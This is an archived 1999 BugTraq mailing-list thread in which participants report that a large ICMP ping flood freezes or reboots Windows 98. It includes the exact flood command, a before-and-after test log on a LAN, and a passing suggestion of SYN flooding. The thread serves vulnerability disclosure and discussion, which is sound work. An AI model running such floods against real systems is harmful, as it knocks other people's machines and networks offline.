Date: Wed, 17 Feb 1999 03:17:26 -0300 From: Fabio Bastiglia Oliva To: BUGTRAQ@netspace.org Subject: Pingflood attack against Windows98 rewt wrote: > > Try pinging the windows box with large amounts of icmp...I left 5 > screened pings, each set to 65000 size...Windows will freeze shortly > after its loaded. You might also try to ping with -f. > Hey... I made what you suggested, and it's true... But in my case the results were a little worse than yours... Windows 98 *REBOOTED* after a ping -f 65000... and wasn't need to make several screen boxes... With only one ping -f 65000 the system rebooted. Best Regards ------------------------------- Fabio Bastiglia Oliva - Director fboliva@safenetworks.com Safe Networks Informatica LTDA. http://www.safenetworks.com ---------------------------------------------------------------------- Date: Thu, 18 Feb 1999 13:32:00 -0500 From: Mark A. Heilpern To: BUGTRAQ@netspace.org Subject: Re: Pingflood attack against Windows98 At 03:17 AM 2/17/99 -0300, you wrote: >rewt wrote: >> >> Try pinging the windows box with large amounts of icmp...I left 5 >> screened pings, each set to 65000 size...Windows will freeze shortly >> after its loaded. You might also try to ping with -f. >> > >Hey... > I made what you suggested, and it's true... But in my case the >results were a little worse than yours... > Windows 98 *REBOOTED* after a ping -f 65000... and wasn't need >to make several screen boxes... With only one ping -f 65000 the system >rebooted. I issued "ping -f -s 65000 my-win98-address" and after a single return, win98 locked up cold. I was ssh'd from win98 to linux to issue the ping, so I might have had more returns than timing allowed to be displayed before I locked up. ---------------------------------------------------------------------- Date: Thu, 18 Feb 1999 21:44:24 -0300 From: Fabio Bastiglia Oliva To: BUGTRAQ@netspace.org Subject: Re: Pingflood attack against Windows98 Hello all, As I said before, forgive me, because my english is not so good! I'll make a "Multi-reply" in this email... It's easier ;) Thanks for all the replies! ------------------------------------------------------------------------ ------------------------------------------------------------------------ James wrote: > > This on a LAN or Internet or both? > > I made this test in my LAN. -LAN Speed: 10Mbits. -NICs (Network Interface Card): 3Com905btx, Genius, Encore & Realtek. -Hubs: 3Com Super Stack II. -Windows98 Versions: 4.10.1998 (Portuguese and English versions) ------------------------------------------------------------------------ ------------------------------------------------------------------------ Laurent LEVIER wrote: > > I tried with the French version of Windows 98. > > when I run ping -l 65000 -f IPaddr. > > ping refuses. Of course ping -f 65000 is not accepted too. > > Strange the ping command changes between US & FR version. > Sorry, I made a mistake when sent the email to Bugtraq. The correct command (From Linux Slackware 3.6 Kernel 2.0.36) line is: ping -f -s 65000 IPaddr ------------------------------------------------------------------------ ------------------------------------------------------------------------ Quantum wrote: > > I just tried it & had no success at my Win98 dos prompt, > Try from a linux... I got these results flooding from a Linux Slackware 3.6 Kernel 2.0.36... ------------------------------------------------------------------------ ------------------------------------------------------------------------ Tom Van Riper > > yeah no kidding, the world has known a dialup connection weither it be > windows or a unix type operating system, that a small amount of icmp > packets will kill the connection for years, thats old stuff. > try synfluding on ports 0-65535 for some real fun ;) Hehe... But a synflood just made the LAN Communication slower, and didn't affected Windows 98 than pingflood affected! Tom Van Riper Dreamscape Online ------------------------------------------------------------------------ Best Regards ------------------------------- Fabio Bastiglia Oliva - Diretor fboliva@safenetworks.com Safe Networks Informatica LTDA. http://www.safenetworks.com ---------------------------------------------------------------------- Date: Fri, 19 Feb 1999 01:16:44 -0300 From: Fabio Bastiglia Oliva To: BUGTRAQ@netspace.org Subject: Pingflood attack against Windows98 - The Test Hello all, This is what is happening when I ping flood a Windows98 from a Linux Slackware 3.6 (Kernel 2.0.36). -Before the attack- linux:~# ping 192.168.1.4 PING 192.168.1.4 (192.168.1.4): 56 data bytes 64 bytes from 192.168.1.4: icmp_seq=0 ttl=128 time=0.5 ms 64 bytes from 192.168.1.4: icmp_seq=1 ttl=128 time=0.5 ms --- 192.168.1.4 ping statistics --- 2 packets transmitted, 2 packets received, 0% packet loss round-trip min/avg/max = 0.5/0.5/0.5 ms -The Attack- linux:~# ping -f -s 65000 192.168.1.4 PING 192.168.1.3 (192.168.1.4): 65000 data bytes ....................................................................... ...................................................../*After lots of little dots... Windows98 Rebooted*/... --- 192.168.1.4 ping statistics --- 11440 packets transmitted, 228 packets received, 98% packet loss round-trip min/avg/max = 0.6/32.0/64.2 ms -After the attack- linux:~# ping 192.168.1.4 PING 192.168.1.4 (192.168.1.4): 56 data bytes --- 192.168.1.4 ping statistics --- 4 packets transmitted, 0 packets received, 100% packet loss --- It's what's happening here... Anyone of you got the same results? Best Regards -------------------------------- Fabio Bastiglia Oliva - Director fboliva@safenetworks.com Safe Networks Informatica LTDA. http://www.safenetworks.com